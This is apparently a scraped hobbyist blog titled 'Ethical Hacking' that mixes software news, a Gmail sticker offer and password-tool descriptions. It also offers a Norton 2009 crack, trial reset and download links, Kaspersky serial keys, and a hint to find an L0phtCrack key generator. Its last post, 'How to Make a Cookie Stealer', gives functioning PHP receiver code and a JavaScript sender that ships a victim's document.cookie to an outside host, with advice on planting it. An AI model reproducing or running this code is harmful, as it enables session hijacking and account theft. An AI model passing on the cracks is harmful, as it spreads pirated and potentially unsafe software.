Ethical Hacking

Icon

Just another WordPress.com weblog

L0phtcrack

L0phtcrack : Windows password auditing and recovery application

L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won’t sell you a key, so you’ll either have to cease using it or find a key generator.


<!–
ch_client = “somkumar009”;
ch_type = “mpu”;
ch_width = 468;
ch_height = 180;
ch_non_contextual = 4;
ch_vertical =”premium”;
ch_sid = “Chitika Premium”;
var ch_queries = new Array( );
var ch_selected=Math.floor((Math.random()*ch_queries.length));
if ( ch_selected < ch_queries.length ) {
ch_query = ch_queries[ch_selected];
}
//–>

Filed under: cracker, password cracker, password stealer

Get your Gmail stickers


Not too long ago, one of the Gmail engineers broke out her vinyl cutter and made some Gmail m-velope stickers. Pretty soon, they were pasted to our desks, stuck on our laptops, and adorning the walls around the office. Then other people started asking us about them — first it was just other Googlers. But when a guy I was sitting next to on an airplane asked where he could get a Gmail sticker, we realized other people might like them too.

So we designed some more, and printed up a whole bunch.

There’s the standard Gmail m-velope — dressed up in glitter. One of three bookplate style stickers you can stick on anything from the inside of a favorite book to your laptop or your skateboard. (Trading with friends is encouraged — we realize the unicorn isn’t for everyone.) And there’s a sheet of keyboard shortcut stickers intended as a tool to help people learn Gmail’s shortcuts. The adhesive is a bit more removable than standard stickiness, so you can take them off once you’ve trained your fingers.

So how do you get your stickers? We may be all about speedy electronic communication, but this time we’re going old school with snail mail. Just send a self-addressed stamped envelope (along with a note if you’re so inclined) to:

Send me some Gmail stickers already
P.O. Box 391420
Mountain View, CA 94039-1420

Make sure to include enough postage to return a sticker pack via U.S. mail. It’s less than one ounce, so a standard $0.42 stamp will do if you’re in the United States; enclose an international reply coupon (IRC) if you’re outside of the U.S. And be sure to send your envelope in soon — one per person please.

Note : This post has been taken from official gmail blog

Filed under: gmail

Cain and abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.

Download Cain & Abel v2.0 for Windows 9x (discontinued and not supported anymore)
MD5 – A14185FAFC1A0A433752A75C0B8CE15D
SHA1 – 8F310D3BECC4D18803AF31575E8035B44FE37418

Download Cain & Abel v4.9.26 for Windows NT/2000/XP
MD5 – F40DDC166B29DB24BDCB68285AFB0CD8
SHA1 – 974856F989B312A91A2EE5519C16D9F559875104

WARNING !!! The password list file format is changed between version 4.9.10 and 4.9.14. Old LST files are not compatible anymore so it is strongly suggested to backup your files before upgrade to this new release.

Filed under: hacking, password recovery tool, remote hacking

Norton antivirus 2009 full + crack+keygen

This crack is for Norton Internet Security 2009 & Norton AntiVirus 2009. It just resets the trial period every time you start your computer. It is only for Windows XP (x32) & Vista (x32). I wasn’t able to get Norton 2009 to install on Windows x64. There is a nag screen when you open up Norton 2009.

Installation:

1. Install Norton 2009. (It would be best if you are not connected to the internet.)
2. Install crack and restart your PC.
3. To remove, just use the uninstall.

Download : NAV2009 | NIS2009

Crack : Mirror1 | Mirror2

TrialReset : Norton TrialReset v.1.5

Filed under: antivirus, norton

Abyss Web Server X1 2.6

Abyss Web Server X1 is a free, personal Web server. Despite its small footprint, it supports secure SSL connections (HTTPS), CGI scripts, FastCGI, ISAPI extensions, ASP.NET, server-side includes (SSI), download resuming, caching negotiation, logging, custom error pages, password protection, IP address control, URL rewriting, aliases, custom MIME types, index files, custom directory listings, anti-leeching, and bandwidth throttling. It also features an automatic anti-hacking system and an intuitive multilingual remote Web management interface. With Abyss Web Server X1, hosting your site and your PHP, Perl, Python, ASP, Ruby on Rails, or ASP.NET Web applications takes only a few minutes. Versions for Mac OS X, Linux, and FreeBSD are also available.

Download from here

Filed under: Uncategorized

LogonStudio Vista 1

LogonStudio Vista 1


LogonStudio Vista is a free program that enables users to change the user logon screen to Windows Vista. Many logons are included with the program and hundreds of additional logons are available on WinCustomize.com for free.



Download from here

Filed under: Uncategorized

KAV7.0.0.125EN.EXE

Download KAV7.0.0.125en full version with serial keys.

Its the most used and very good antivirus for your computers.
Download from
here

Filed under: antivirus, kav

Internet Explorer 8

Microsoft on Monday released a near-final “release candidate” version of Internet Explorer 8, the next version of its Web browser.

The software maker plans to say more on its Web site around noon, but, as noted by enthusiast site Neowin, the code is already available from Microsoft’s download center.

InPrivate

Among the new features in IE 8 is a browsing mode known as InPrivate, designed not to leave fingerprints on a PC.

(Credit: Microsoft)

With IE 8, Microsoft is hoping to regain some lost ground by adding features such as private browsing, improved security, and a new type of add-ons, called accelerators.

On the security front, Microsoft is adding a cross-site scripting filter, as well as protections against a type of attack known as clickjacking.

In an interview, IE General Manager Dean Hachamovitch said there will be little change between the release candidate and the final version, though he declined to say when the final version will be released.

“The ecosystem should expect the final candidate to behave like the release candidate,” Hachamovitch said.

Internet Explorer 8 will work with Windows XP (Service Pack 2 or later) and Windows Vista. A version of IE 8 is also being built into Windows 7.

However, the IE code in Windows 7 is a pre-release candidate version.

“Windows 7 enables unique features and functionality in Internet Explorer 8 including Windows Touch and Jump Lists which require additional product tests to ensure we are providing the best Windows experience for our customers,” the software maker said in a statement. “Microsoft will continue to update the version of Internet Explorer 8 running on Windows 7 as the development cycles of Windows 7 progress.”

Experience Internet Explorer 8

download nero 9 full version

Filed under: browser, internet, internet explorer 8, web browser

Earn money

var googleSearchIframeName = “cse-search-results”;
var googleSearchFormName = “cse-search-box”;
var googleSearchFrameWidth = 800;
var googleSearchDomain = “www.google.co.in”;
var googleSearchPath = “/cse”;

Filed under: Uncategorized

How to Make a Cookie Stealer

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it’s just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver’s job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, “page.php?arg1=value”). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We’ll look at both.

First, let’s look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
mail(“me@mydomain.com”, “Cookie stealer report”, $cookie); // line 3
?> // line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL (“stealer.php?cookie=x”) and stores it in the variable $cookie.
Line 3 accesses PHP’s mail() function and sends the cookie to “me@mydomain.com” with the subject of “Cookie stealer report”.
Line 4 tells the server that the PHP code ends here.

Next, we’ll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
$file = fopen(‘cookielog.txt’, ‘a’); // line 3
fwrite($file, $cookie . “nn”); // line 4
?> // line 5

Lines 1 and 2 are the same as before.
Line 3 opens the file “cookielog.txt” for writing, then stores the file’s handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and “nn” combines the two strings as one. The “nn” acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 1
document.location=”http://www.host.com/mysite/stealer.php?cookie=&#8221; + document.cookie; // Line 2
// Line 3

Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).

There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

Filed under: cookie, cookie stealer